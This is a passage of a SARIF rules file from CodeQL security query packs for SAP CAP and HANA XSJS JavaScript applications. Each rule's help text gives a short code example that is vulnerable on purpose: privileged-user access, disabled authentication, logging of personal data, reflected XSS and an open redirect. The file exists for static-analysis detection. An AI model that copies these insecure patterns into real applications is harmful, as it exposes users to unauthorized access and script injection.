attribute of the option argument to the call of `cds.ApplicationService.tx()` in order to check the required access rights of the entity against that of the user.\n\n## Examples\n\nThe following service, named Service1 and implemented in the file service1.js, is accessing an entity that belongs to another service named Service2 and defined in the file service2.cds. The entity, Service2Entity, demands that the user have level greater than 2.\n\n### `service1.js`\n\n``` javascript\nthis.on(\"action1\", async (req) => {\n  const Service2 = await cds.connect.to(\"Service2\");\n  const { Service2Entity } = Service2.entities;\n  return this.tx({ user: new cds.User.Privileged(\"\") }, (tx) =>\n    tx.run(\n      SELECT.from(Service2Entity) // Declared in service2.cds\n        .where`Attribute4=${req.data.messageToPass}`,\n    ),\n  );\n});\n```\n\n### `service2.cds`\n\n``` cds\nservice Service2 @(path: 'service-2') {\n  /* Read access only to users with access level greater than 2. */\n  @(restrict: [ { grant: 'READ', to: '$user.level > 2' } ])\n  entity Service2Entity {\n    Attribute1 : String(100);\n    Attribute2 : String(100)\n  }\n}\n```\n\n## References\n\n- SAP CAPire Documentation: [cds.User.Privileged](https://cap.cloud.sap/docs/node.js/authentication#privileged-user).\n- SAP CAPire Documentation: [cds.tx()](https://cap.cloud.sap/docs/node.js/cds-tx#srv-tx-ctx).\n- Common Weakness Enumeration: [CWE-250](https://cwe.mitre.org/data/definitions/250.html).\n- Common Weakness Enumeration: [CWE-266](https://cwe.mitre.org/data/definitions/266.html).\n","markdown":"# Access rights to an entity is unnecessarily elevated to privileged\n\nThe privileged user `cds.User.Privileged` is used to access an entity that requires authorization. If the application does not verify the actual user rights, it may expose protected entities to unauthorized users.\n\nThis is especially important when the accessed entity belongs to a remote service. By default, when using a production-grade authentication strategy all CAP endpoints are authenticated. However, if the entity is outside the application, there is no guarantee that the user is authenticated in the remote service.\n\n## Recommendations\n\n### Avoid using `cds.User.Privileged` when accessing an access-controlled entity\n\nAny entity that requires authorization should be accessed within the context of the authenticated user. When using a transaction, prefer using `cds.User` as the `user` attribute of the option argument to the call of `cds.ApplicationService.tx()` in order to check the required access rights of the entity against that of the user.\n\n## Examples\n\nThe following service, named Service1 and implemented in the file service1.js, is accessing an entity that belongs to another service named Service2 and defined in the file service2.cds. The entity, Service2Entity, demands that the user have level greater than 2.\n\n### `service1.js`\n\n``` javascript\nthis.on(\"action1\", async (req) => {\n  const Service2 = await cds.connect.to(\"Service2\");\n  const { Service2Entity } = Service2.entities;\n  return this.tx({ user: new cds.User.Privileged(\"\") }, (tx) =>\n    tx.run(\n      SELECT.from(Service2Entity) // Declared in service2.cds\n        .where`Attribute4=${req.data.messageToPass}`,\n    ),\n  );\n});\n```\n\n### `service2.cds`\n\n``` cds\nservice Service2 @(path: 'service-2') {\n  /* Read access only to users with access level greater than 2. */\n  @(restrict: [ { grant: 'READ', to: '$user.level > 2' } ])\n  entity Service2Entity {\n    Attribute1 : String(100);\n    Attribute2 : String(100)\n  }\n}\n```\n\n## References\n\n- SAP CAPire Documentation: [cds.User.Privileged](https://cap.cloud.sap/docs/node.js/authentication#privileged-user).\n- SAP CAPire Documentation: [cds.tx()](https://cap.cloud.sap/docs/node.js/cds-tx#srv-tx-ctx).\n- Common Weakness Enumeration: [CWE-250](https://cwe.mitre.org/data/definitions/250.html).\n- Common Weakness Enumeration: [CWE-266](https://cwe.mitre.org/data/definitions/266.html).\n"},"properties":{"tags":["security"],"description":"An entity requiring authorization is being accessed with privileged rights.","id":"js/cap-unnecessarily-granted-privileged-access-rights","kind":"problem","name":"Access rights to an entity is unnecessarily elevated to privileged","precision":"high","problem.severity":"error","security-severity":"6"}},{"id":"js/cap-entity-exposed-without-authentication","name":"js/cap-entity-exposed-without-authentication","shortDescription":{"text":"Entity exposed without authentication"},"fullDescription":{"text":"Entities exposed to external protocols should require an CDS-based or JS-based access control."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# CAP Definitions Exposed without Access Controls\n\nAlthough using a production-level authentication strategy such as `jwt` ensures that all entities and services require the user to be authenticated, this does not guarantee any further authorization. Furthermore, the lack of required authentication or authorization may imply a gap in the design of the system.\n\n## Recommendation\n\n### Use CDS-based authorization\n\nCDL provides two annotations to declare access controls `@requires` and `@restrict` with the latter providing more granularity than the former. For example, to check if a request is being made by an authenticated user to the CDL entity or service, annotate it with `@requires: 'authenticated-user'`. On the other hand, if it needs to be read only via a certain group of users where the user has level greater than 2, use `@restrict: { grant: 'READ', to: 'SomeUser', where: { $user.level > 2 } }` (note the leading `$`).\n\n#### Check the original CDS entity it is derived from\n\nCDS entities may be derived from other entities by means of selection and projection. Derived definitions inherit access control conditions and optionally override them. In order to accurately determine what authorization an entity requires, the access control of the parent entity should be transitively inspected.\n\n### Enforce authorization with JavaScript\n\nAccess control may be enforced when a request handler for the relevant entity or service is registered. Both `cds.Service.before` and `cds.Service.on` may be used for enforcement. For example, to restrict writing to and updating an entity to a user satisfying certain requirements, either one of the below handler registrations may be used:\n\n``` javascript\n/**\n * Before serving a request to access SomeEntity, check if the request is coming from a user\n * with SomeRole and level greater than 3.\n */\nthis.before([\"WRITE\", \"UPDATE\"], \"SomeEntity\", (req) => {\n  (req.user.is(\"SomeRole\") && req.user.attr.level > 3) || req.reject(403);\n});\n\n/**\n * On request to access SomeEntity, check if the request is coming from a user\n * with SomeRole and level greater than 3.\n */\nthis.on([\"WRITE\", \"UPDATE\"], \"SomeEntity\", (req) => {\n  if (req.user.is(\"SomeRole\") && req.user.attr.level > 3) {\n    /* Do something */\n  } else req.reject(403);\n});\n```\n\n## Examples\n\nThe following CDS definition and its JavaScript implementation imposes no authorization on `SomeEntity`. Note that the `OriginalEntity` from which `DerivedEntity` derives from does not control the access either.\n\n### db/schema.cds\n\n``` cap-cds\nnamespace sample_namespace.sample_entities;\n\nentity OriginalEntity {\n  Attribute1 : String(100);\n  Attribute2 : String(100)\n}\n```\n\n### srv/service1.cds\n\n``` cap-cds\nusing { sample_namespace.sample_entities as db_schema } from '../db/schema';\n\nservice SomeService {\n  entity DerivedEntity as projection on db_schema.OriginalEntity excluding { Attribute2 }\n}\n```\n\n### srv/service1.js\n\n``` javascript\n\nconst cds = require(\"@sap/cds\");\n\nmodule.exports = class Service1 extends cds.ApplicationService {\n  init() {\n    this.on(\"READ\", \"SomeService\", (req) => { })\n  }\n}\n```\n\n## References\n\n- SAP CAPire Documentation: [Authorization Enforcement](https://cap.cloud.sap/docs/node.js/authentication#enforcement).\n- SAP CAPire Documentation: [@restrict](https://cap.cloud.sap/docs/guides/security/authorization#restrict-annotation).\n- SAP CAPire Documentation:\n[@requires](https://cap.cloud.sap/docs/guides/security/authorization#requires).\n- SAP CAPire Documentation: [Protecting Certain Entries](https://cap.cloud.sap/docs/cds/common#protecting-certain-entries).\n- SAP CAPire Documentation: [Inheritance of Restrictions](https://cap.cloud.sap/docs/guides/security/authorization#inheritance-of-restrictions).\n- SAP CAPire Documentation: [Authentication Enforced in Production](https://cap.cloud.sap/docs/node.js/authentication#authentication-enforced-in-production).\n- Common Weakness Enumeration: [CWE-862](https://cwe.mitre.org/data/definitions/862.html).\n- Common Weakness Enumeration: [CWE-306](https://cwe.mitre.org/data/definitions/306.html).\n","markdown":"# CAP Definitions Exposed without Access Controls\n\nAlthough using a production-level authentication strategy such as `jwt` ensures that all entities and services require the user to be authenticated, this does not guarantee any further authorization. Furthermore, the lack of required authentication or authorization may imply a gap in the design of the system.\n\n## Recommendation\n\n### Use CDS-based authorization\n\nCDL provides two annotations to declare access controls `@requires` and `@restrict` with the latter providing more granularity than the former. For example, to check if a request is being made by an authenticated user to the CDL entity or service, annotate it with `@requires: 'authenticated-user'`. On the other hand, if it needs to be read only via a certain group of users where the user has level greater than 2, use `@restrict: { grant: 'READ', to: 'SomeUser', where: { $user.level > 2 } }` (note the leading `$`).\n\n#### Check the original CDS entity it is derived from\n\nCDS entities may be derived from other entities by means of selection and projection. Derived definitions inherit access control conditions and optionally override them. In order to accurately determine what authorization an entity requires, the access control of the parent entity should be transitively inspected.\n\n### Enforce authorization with JavaScript\n\nAccess control may be enforced when a request handler for the relevant entity or service is registered. Both `cds.Service.before` and `cds.Service.on` may be used for enforcement. For example, to restrict writing to and updating an entity to a user satisfying certain requirements, either one of the below handler registrations may be used:\n\n``` javascript\n/**\n * Before serving a request to access SomeEntity, check if the request is coming from a user\n * with SomeRole and level greater than 3.\n */\nthis.before([\"WRITE\", \"UPDATE\"], \"SomeEntity\", (req) => {\n  (req.user.is(\"SomeRole\") && req.user.attr.level > 3) || req.reject(403);\n});\n\n/**\n * On request to access SomeEntity, check if the request is coming from a user\n * with SomeRole and level greater than 3.\n */\nthis.on([\"WRITE\", \"UPDATE\"], \"SomeEntity\", (req) => {\n  if (req.user.is(\"SomeRole\") && req.user.attr.level > 3) {\n    /* Do something */\n  } else req.reject(403);\n});\n```\n\n## Examples\n\nThe following CDS definition and its JavaScript implementation imposes no authorization on `SomeEntity`. Note that the `OriginalEntity` from which `DerivedEntity` derives from does not control the access either.\n\n### db/schema.cds\n\n``` cap-cds\nnamespace sample_namespace.sample_entities;\n\nentity OriginalEntity {\n  Attribute1 : String(100);\n  Attribute2 : String(100)\n}\n```\n\n### srv/service1.cds\n\n``` cap-cds\nusing { sample_namespace.sample_entities as db_schema } from '../db/schema';\n\nservice SomeService {\n  entity DerivedEntity as projection on db_schema.OriginalEntity excluding { Attribute2 }\n}\n```\n\n### srv/service1.js\n\n``` javascript\n\nconst cds = require(\"@sap/cds\");\n\nmodule.exports = class Service1 extends cds.ApplicationService {\n  init() {\n    this.on(\"READ\", \"SomeService\", (req) => { })\n  }\n}\n```\n\n## References\n\n- SAP CAPire Documentation: [Authorization Enforcement](https://cap.cloud.sap/docs/node.js/authentication#enforcement).\n- SAP CAPire Documentation: [@restrict](https://cap.cloud.sap/docs/guides/security/authorization#restrict-annotation).\n- SAP CAPire Documentation:\n[@requires](https://cap.cloud.sap/docs/guides/security/authorization#requires).\n- SAP CAPire Documentation: [Protecting Certain Entries](https://cap.cloud.sap/docs/cds/common#protecting-certain-entries).\n- SAP CAPire Documentation: [Inheritance of Restrictions](https://cap.cloud.sap/docs/guides/security/authorization#inheritance-of-restrictions).\n- SAP CAPire Documentation: [Authentication Enforced in Production](https://cap.cloud.sap/docs/node.js/authentication#authentication-enforced-in-production).\n- Common Weakness Enumeration: [CWE-862](https://cwe.mitre.org/data/definitions/862.html).\n- Common Weakness Enumeration: [CWE-306](https://cwe.mitre.org/data/definitions/306.html).\n"},"properties":{"tags":["security"],"description":"Entities exposed to external protocols should require an\n              CDS-based or JS-based access control.","id":"js/cap-entity-exposed-without-authentication","kind":"problem","name":"Entity exposed without authentication","precision":"high","problem.severity":"warning","security-severity":"6"}},{"id":"js/cap-sensitive-log","name":"js/cap-sensitive-log","shortDescription":{"text":"Insertion of sensitive information into log files"},"fullDescription":{"text":"Writing sensitive information to log files can allow that information to be leaked to an attacker more easily."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# CAP Insertion of Sensitive Information into Log File\n\nIf sensitive information is written to a log entry using the CAP Node.js logging API, a malicious user may be able to gain access to user data.\n\nData annotated as `@PersonalData` should not be logged.\n\n## Recommendation\n\nCAP applications should not log sensitive information. Check CDS declarations for annotations before logging certain data types or fields.\n\n## Examples\n\nThis CAP service directly logs the sensitive information.\n\n```cds\nnamespace advanced_security.log_exposure.sample_entities;\n\nentity Sample {\n    name         : String(111);\n}\n\n// annotations for Data Privacy\nannotate Sample with\n@PersonalData : { DataSubjectRole : 'Sample', EntitySemantics : 'DataSubject' }\n{\n  name  @PersonalData.IsPotentiallySensitive;\n}\n```\n\n``` javascript\nimport cds from '@sap/cds'\nconst LOG = cds.log(\"logger\");\n\nconst { Sample } = cds.entities('advanced_security.log_exposure.sample_entities')\n\nclass SampleVulnService extends cds.ApplicationService {\n    init() {\n        LOG.info(\"Received: \", Sample.name); // CAP log exposure alert\n    }\n}\n```\n\n## References\n\n- OWASP 2021: [Security Logging and Monitoring Failures](https://owasp.org/Top10/A09_2021-Security_Logging_and_Monitoring_Failures/).\n- OWASP: [Logging Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- OWASP: [User Privacy Protection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/User_Privacy_Protection_Cheat_Sheet.html).\n- SAP CAPire Documentation: [PersonalData Annotations](https://cap.cloud.sap/docs/guides/data-privacy/annotations).","markdown":"# CAP Insertion of Sensitive Information into Log File\n\nIf sensitive information is written to a log entry using the CAP Node.js logging API, a malicious user may be able to gain access to user data.\n\nData annotated as `@PersonalData` should not be logged.\n\n## Recommendation\n\nCAP applications should not log sensitive information. Check CDS declarations for annotations before logging certain data types or fields.\n\n## Examples\n\nThis CAP service directly logs the sensitive information.\n\n```cds\nnamespace advanced_security.log_exposure.sample_entities;\n\nentity Sample {\n    name         : String(111);\n}\n\n// annotations for Data Privacy\nannotate Sample with\n@PersonalData : { DataSubjectRole : 'Sample', EntitySemantics : 'DataSubject' }\n{\n  name  @PersonalData.IsPotentiallySensitive;\n}\n```\n\n``` javascript\nimport cds from '@sap/cds'\nconst LOG = cds.log(\"logger\");\n\nconst { Sample } = cds.entities('advanced_security.log_exposure.sample_entities')\n\nclass SampleVulnService extends cds.ApplicationService {\n    init() {\n        LOG.info(\"Received: \", Sample.name); // CAP log exposure alert\n    }\n}\n```\n\n## References\n\n- OWASP 2021: [Security Logging and Monitoring Failures](https://owasp.org/Top10/A09_2021-Security_Logging_and_Monitoring_Failures/).\n- OWASP: [Logging Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- OWASP: [User Privacy Protection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/User_Privacy_Protection_Cheat_Sheet.html).\n- SAP CAPire Documentation: [PersonalData Annotations](https://cap.cloud.sap/docs/guides/data-privacy/annotations)."},"properties":{"tags":["security","external/cwe/cwe-532"],"description":"Writing sensitive information to log files can allow that\n              information to be leaked to an attacker more easily.","id":"js/cap-sensitive-log","kind":"path-problem","name":"Insertion of sensitive information into log files","precision":"medium","problem.severity":"warning","security-severity":"7.5"}}],"locations":[{"uri":"file:///home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/src/","description":{"text":"The QL pack root directory."},"properties":{"tags":["CodeQL/LocalPackRoot"]}},{"uri":"file:///home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/src/qlpack.yml","description":{"text":"The QL pack definition file."},"properties":{"tags":["CodeQL/LocalPackDefinitionFile"]}}]},{"name":"advanced-security/javascript-sap-xsjs-queries","semanticVersion":"2.3.0+beda8c5e77ff63cd984068207702212afd00b7f4","rules":[{"id":"js/xsjs-broken-authentication","name":"js/xsjs-broken-authentication","shortDescription":{"text":"Broken XSJS authentication"},"fullDescription":{"text":"Disabling XSJS authentication makes the application vulnerable to unauthorized access."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Authentication not enforced in HANA XS application\n\nThis HANA XS application does not enforce authentication on the requests it handles.\n\n## Overview\n\nSAP HANA XS applications are called via HTTP requests to process a connected HANA database, and this makes it critical to authenticate the sender of the request. Failing to do so allows attackers to impersonate users and gain access to underlying systems and data.\n\n## Recommendation\n\nUse the built-in SAP HANA XS authentication mechanism and session management (cookies).\n- If `XS Advanced` is used, authentication **is enabled by default**, and the `authenticationMethod` property indicates which authentication will be applied. However, avoid setting the property to something else than `none`, as doing so turns off all authentication on all routes.\n- If `XS Classic` is used, authentication is **not enabled by default**, so the `authentication` property in the application's `.xsaccess` file should be set to enable authentication. Set the value of the property according to the method you want to implement (`LogonTicket`, `Form`, or `Basic`).\n\n## Example\n\nThe fragment from an `xs-app.json` file shows the application in question having its authentication explicitly disabled.\n\n```json\n{\n  \"welcomeFile\": \"index.html\",\n  \"authenticationMethod\": \"none\",\n  ...\n}\n```\n\n## References\n\n- SAP: [Server-Side JavaScript Security Considerations](https://help.sap.com/docs/SAP_HANA_PLATFORM/d89d4595fae647eabc14002c0340a999/2040c1b7e478448cb9904c55ac06cac8.html).\n- SAP: [XS Advanced Application Router Configuration](https://help.sap.com/docs/SAP_HANA_PLATFORM/4505d0bdaf4948449b7f7379d24d0f0d/5f77e58ec01b46f6b64ee1e2afe3ead7.html#authenticationmethod), relevant to XS Advanced applications.\n- SAP: [Application-Access File Keyword Options: Authentication](https://help.sap.com/docs/SAP_HANA_PLATFORM/b3d0daf2a98e49ada00bf31b7ca7a42e/a9fc5c220d744180850996e2f5d34d6c.html?version=2.0.03&locale=en-US#authentication), relevant to XS Classic applications.\n- Common Weakness Enumeration: [CWE-306](https://cwe.mitre.org/data/definitions/306.html).\n","markdown":"# Authentication not enforced in HANA XS application\n\nThis HANA XS application does not enforce authentication on the requests it handles.\n\n## Overview\n\nSAP HANA XS applications are called via HTTP requests to process a connected HANA database, and this makes it critical to authenticate the sender of the request. Failing to do so allows attackers to impersonate users and gain access to underlying systems and data.\n\n## Recommendation\n\nUse the built-in SAP HANA XS authentication mechanism and session management (cookies).\n- If `XS Advanced` is used, authentication **is enabled by default**, and the `authenticationMethod` property indicates which authentication will be applied. However, avoid setting the property to something else than `none`, as doing so turns off all authentication on all routes.\n- If `XS Classic` is used, authentication is **not enabled by default**, so the `authentication` property in the application's `.xsaccess` file should be set to enable authentication. Set the value of the property according to the method you want to implement (`LogonTicket`, `Form`, or `Basic`).\n\n## Example\n\nThe fragment from an `xs-app.json` file shows the application in question having its authentication explicitly disabled.\n\n```json\n{\n  \"welcomeFile\": \"index.html\",\n  \"authenticationMethod\": \"none\",\n  ...\n}\n```\n\n## References\n\n- SAP: [Server-Side JavaScript Security Considerations](https://help.sap.com/docs/SAP_HANA_PLATFORM/d89d4595fae647eabc14002c0340a999/2040c1b7e478448cb9904c55ac06cac8.html).\n- SAP: [XS Advanced Application Router Configuration](https://help.sap.com/docs/SAP_HANA_PLATFORM/4505d0bdaf4948449b7f7379d24d0f0d/5f77e58ec01b46f6b64ee1e2afe3ead7.html#authenticationmethod), relevant to XS Advanced applications.\n- SAP: [Application-Access File Keyword Options: Authentication](https://help.sap.com/docs/SAP_HANA_PLATFORM/b3d0daf2a98e49ada00bf31b7ca7a42e/a9fc5c220d744180850996e2f5d34d6c.html?version=2.0.03&locale=en-US#authentication), relevant to XS Classic applications.\n- Common Weakness Enumeration: [CWE-306](https://cwe.mitre.org/data/definitions/306.html).\n"},"properties":{"tags":["security","external/cwe/cwe-306"],"description":"Disabling XSJS authentication makes the application vulnerable to unauthorized access.","id":"js/xsjs-broken-authentication","kind":"problem","name":"Broken XSJS authentication","precision":"medium","problem.severity":"warning","security-severity":"7.5"}},{"id":"js/xsjs-reflected-xss","name":"js/xsjs-reflected-xss","shortDescription":{"text":"XSJS Reflected XSS"},"fullDescription":{"text":"Including uncontrolled value into a response body and setting it to a scriptable MIME type allows for cross-site scripting vulnerability."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Reflected Cross-site Scripting\n\nIncluding a text, received from a client browser typically through an XSJS request parameter, to be rendered as HTML in a request body may execute arbitrary JavaScript code on the client.\n\n## Recommendation\n\nThe XSJS application should always validate or sanitize the submitted string from a client before including it into a response body to be rendered in a client browser.\n\n### Validate the input string\n\nValidate the submitted input by looking for a sensitive HTML tag such as `<script ...>...</script>`. The pattern may be encoded to a regular expression and matched against the input; If there is a match, then the XSJS application may decide to abort the process and instead return an HTTP code stating that the application rejected the request (e.g. `$.net.FORBIDDEN`). XSJS does not provide a function to reliably perform the above, therefore using a third-party library is recommended.\n\n### Sanitize the input string\n\n#### Server-side sanitization\n\nThe XSJS application may instead allow any user input, but sanitize it before it integrates it into the response body. This is achieved by escaping special characters that are treated as part of the HTML syntax, such as `\"`, `&`, `'`, `<`, and `>`. Since XSJS does not provide a function to escape these, using a third-party library is recommended.\n\n#### Client-side sanitization\n\nAlternatively, if SAP UI5 is used on the frontend, there are client-side escaping mechanisms such as `sap.base.security.encodeXML` and `sap.base.security.encodeHTML`. If `sap.ui.core.HTML` is used in the frontend view, consider setting its `sanitizeContent` property explicitly to `true`, since its default value is `false`.\n\n## Example\n\nThe following XSJS application sets the response body directly to a string received from a user without any validation or sanitization. The header's content type is set as an HTML document, which allows for any embedded JavaScript to be run in the request body. Note that even if `clientData` was not enclosed in a `div`, the vulnerability would still exist.\n\n``` javascript\nlet clientData = requestParameters.get(\"someParameter\");\n$.response.contentType = \"text/html\";\n$.response.setBody(\"<div>\" + clientData + \"</div>\");\n$.response.status = $.net.http.OK;\n```\n\n## References\n\n* SAP: [Server-Side JavaScript Security Considerations](https://help.sap.com/docs/SAP_HANA_PLATFORM/d89d4595fae647eabc14002c0340a999/b5e65421b48c48fa87312a6023f4c414.html).\n* SAP: [Server-Side JavaScript: Cross-Site Scripting\n](https://help.sap.com/docs/SAP_HANA_PLATFORM/d89d4595fae647eabc14002c0340a999/0e1c9fff826a4583be715386578fffc7.html).\n* OWASP: [Types of Cross-site Scripting](https://owasp.org/www-community/Types_of_Cross-Site_Scripting).\n* OWASP: [Cross Site Scripting Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n\n","markdown":"# Reflected Cross-site Scripting\n\nIncluding a text, received from a client browser typically through an XSJS request parameter, to be rendered as HTML in a request body may execute arbitrary JavaScript code on the client.\n\n## Recommendation\n\nThe XSJS application should always validate or sanitize the submitted string from a client before including it into a response body to be rendered in a client browser.\n\n### Validate the input string\n\nValidate the submitted input by looking for a sensitive HTML tag such as `<script ...>...</script>`. The pattern may be encoded to a regular expression and matched against the input; If there is a match, then the XSJS application may decide to abort the process and instead return an HTTP code stating that the application rejected the request (e.g. `$.net.FORBIDDEN`). XSJS does not provide a function to reliably perform the above, therefore using a third-party library is recommended.\n\n### Sanitize the input string\n\n#### Server-side sanitization\n\nThe XSJS application may instead allow any user input, but sanitize it before it integrates it into the response body. This is achieved by escaping special characters that are treated as part of the HTML syntax, such as `\"`, `&`, `'`, `<`, and `>`. Since XSJS does not provide a function to escape these, using a third-party library is recommended.\n\n#### Client-side sanitization\n\nAlternatively, if SAP UI5 is used on the frontend, there are client-side escaping mechanisms such as `sap.base.security.encodeXML` and `sap.base.security.encodeHTML`. If `sap.ui.core.HTML` is used in the frontend view, consider setting its `sanitizeContent` property explicitly to `true`, since its default value is `false`.\n\n## Example\n\nThe following XSJS application sets the response body directly to a string received from a user without any validation or sanitization. The header's content type is set as an HTML document, which allows for any embedded JavaScript to be run in the request body. Note that even if `clientData` was not enclosed in a `div`, the vulnerability would still exist.\n\n``` javascript\nlet clientData = requestParameters.get(\"someParameter\");\n$.response.contentType = \"text/html\";\n$.response.setBody(\"<div>\" + clientData + \"</div>\");\n$.response.status = $.net.http.OK;\n```\n\n## References\n\n* SAP: [Server-Side JavaScript Security Considerations](https://help.sap.com/docs/SAP_HANA_PLATFORM/d89d4595fae647eabc14002c0340a999/b5e65421b48c48fa87312a6023f4c414.html).\n* SAP: [Server-Side JavaScript: Cross-Site Scripting\n](https://help.sap.com/docs/SAP_HANA_PLATFORM/d89d4595fae647eabc14002c0340a999/0e1c9fff826a4583be715386578fffc7.html).\n* OWASP: [Types of Cross-site Scripting](https://owasp.org/www-community/Types_of_Cross-Site_Scripting).\n* OWASP: [Cross Site Scripting Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n\n"},"properties":{"tags":["security"],"description":"Including uncontrolled value into a response body and setting it to\n              a scriptable MIME type allows for cross-site scripting vulnerability.","id":"js/xsjs-reflected-xss","kind":"path-problem","name":"XSJS Reflected XSS","precision":"medium","problem.severity":"error","security-severity":"7.8"}},{"id":"js/xsjs-url-redirect","name":"js/xsjs-url-redirect","shortDescription":{"text":"XSJS URL Redirect"},"fullDescription":{"text":"Setting the `location` response header to an uncontrolled value allows for redirection to an arbitrary URL."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# URL Redirect\n\nAn HTTP response sent by an XSJS server whose value of the `location` header is dependent on a user input can redirect the client to an arbitrary location on the web by a malicious actor. For example, the redirected URL may point to a carefully imitated webpage of a genuine one, thus may lure a victim to submit its sign-in credentials.\n\n## Recommendation\n\nAvoid setting the entirety of URL or the domain part of it, which is obtained in any way from an external user, to the `location` header value, to keep redirection within the organization's domain. The URL to redirect the user to may be safely restricted by following one or more of the below strategies.\n\n### Redirect to a URL from an internal allow-list\n\nSelect the URL from a predefined allow-list that is kept internal. It may be shared across organizations, but should be kept confidential to any external actors.\n\n### Hardcode the domain part of the URL\n\nIf the URL to redirect the user to needs to be dependent upon a remote value, consider parameterizing only the request parameter portion and hardcode the rest of it, including the domain part. This way the redirection is kept within the organization.\n\n### Use a server-side template engine\n\nThere can be a single URL to which all redirection of the same type can happen where the redirected page can be customized to the customer with the help from a template engine. The details of the page can be filled from the server-side, not the client side through a request parameter. This way the URL does not need to be parameterized in any way while also filling the need for a customized redirect page.\n\n## Example\n\nThe following XSJS application sets the entire value of the location of its response to some URL retrieved from a request parameter.\n\n``` javascript\nlet someParameterValue = requestParameters.get(\"someParameter\");\n$.response.status = $.net.http.OK;\n$.response.headers.set(\"location\", someParameterValue);\n```\n\n## References\n\n* SAP: [Server-Side JavaScript Security Considerations](https://help.sap.com/docs/SAP_HANA_PLATFORM/d89d4595fae647eabc14002c0340a999/b5e65421b48c48fa87312a6023f4c414.html).\n* SAP: [Server-Side JavaScript: Invalid Redirection](https://help.sap.com/docs/SAP_HANA_PLATFORM/d89d4595fae647eabc14002c0340a999/8c5ec75c27f543cb8b4c65c337b285ae.html).\n* Mozilla: [Location](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Location).\n* OWASP: [XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n* Common Weakness Enumeration: [CWE-601](https://cwe.mitre.org/data/definitions/601.html).\n* SAP XSJS Documentation: [$.web.WebRequest](https://help.sap.com/doc/3de842783af24336b6305a3c0223a369/2.0.03/en-US/$.web.WebRequest.html).\n* SAP XSJS Documentation: [$.web.WebResponse](https://help.sap.com/doc/3de842783af24336b6305a3c0223a369/2.0.03/en-US/$.web.WebResponse.html).\n","markdown":"# URL Redirect\n\nAn HTTP response sent by an XSJS server whose value of the `location` header is dependent on a user input can redirect the client to an arbitrary location on the web by a malicious actor. For example, the redirected URL may point to a carefully imitated webpage of a genuine one, thus may lure a victim to submit its sign-in credentials.\n\n## Recommendation\n\nAvoid setting the entirety of URL or the domain part of it, which is obtained in any way from an external user, to the `location` header value, to keep redirection within the organization's domain. The URL to redirect the user to may be safely restricted by following one or more of the below strategies.\n\n### Redirect to a URL from an internal allow-list\n\nSelect the URL from a predefined allow-list that is kept internal. It may be shared across organizations, but should be kept confidential to any external actors.\n\n### Hardcode the domain part of the URL\n\nIf the URL to redirect the user to needs to be dependent upon a remote value, consider parameterizing only the request parameter portion and hardcode the rest of it, including the domain part. This way the redirection is kept within the organization.\n\n### Use a server-side template engine\n\nThere can be a single URL to which all redirection of the same type can happen where the redirected page can be customized to the customer with the help from a template engine. The details of the page can be filled from the server-side, not the client side through a request parameter. This way the URL does not need to be parameterized in any way while also filling the need for a customized redirect page.\n\n## Example\n\nThe following XSJS application sets the entire value of the location of its response to some URL retrieved from a request parameter.\n\n``` javascript\nlet someParameterValue = requestParameters.get(\"someParameter\");\n$.response.status = $.net.http.OK;\n$.response.headers.set(\"location\", someParameterValue);\n```\n\n## References\n\n* SAP: [Server-Side JavaScript Security Considerations](https://help.sap.com/docs/SAP_HANA_PLATFORM/d89d4595fae647eabc14002c0340a999/b5e65421b48c48fa87312a6023f4c414.html).\n* SAP: [Server-Side JavaScript: Invalid Redirection](https://help.sap.com/docs/SAP_HANA_PLATFORM/d89d4595fae647eabc14002c0340a999/8c5ec75c27f543cb8b4c65c337b285ae.html).\n* Mozilla: [Location](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Location).\n* OWASP: [XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n* Common Weakness Enumeration: [CWE-601](https://cwe.mitre.org/data/definitions/601.html).\n* SAP XSJS Documentation: [$.web.WebRequest](https://help.sap.com/doc/3de842783af24336b6305a3c0223a369/2.0.03/en-US/$.web.WebRequest.html).\n* SAP XSJS Documentation: [$.web.WebResponse](https://help.sap.com/doc/3de842783af24336b6305a3c0223a369/2.0.03/en-US/$.web.WebResponse.html).\n"},"properties":{"tags":["security"],"description":"Setting the `location` response header to an uncontrolled value\n              allows for redirection to an arbitrary URL.","id":"js/xsjs-url-redirect","kind":"path-problem","name":"XSJS URL Redirect","precision":"medium","problem.severity":"error","security-severity":"6.1"}},{"id":"js/xsjs-sql-injection","name":"js/xsjs-sql-injection","shortDescription":{"text":"XSJS SQL injection"},"fullDescription":{"text":"Directly concatenating an uncontrolled value with an SQL query allows for an SQL injection 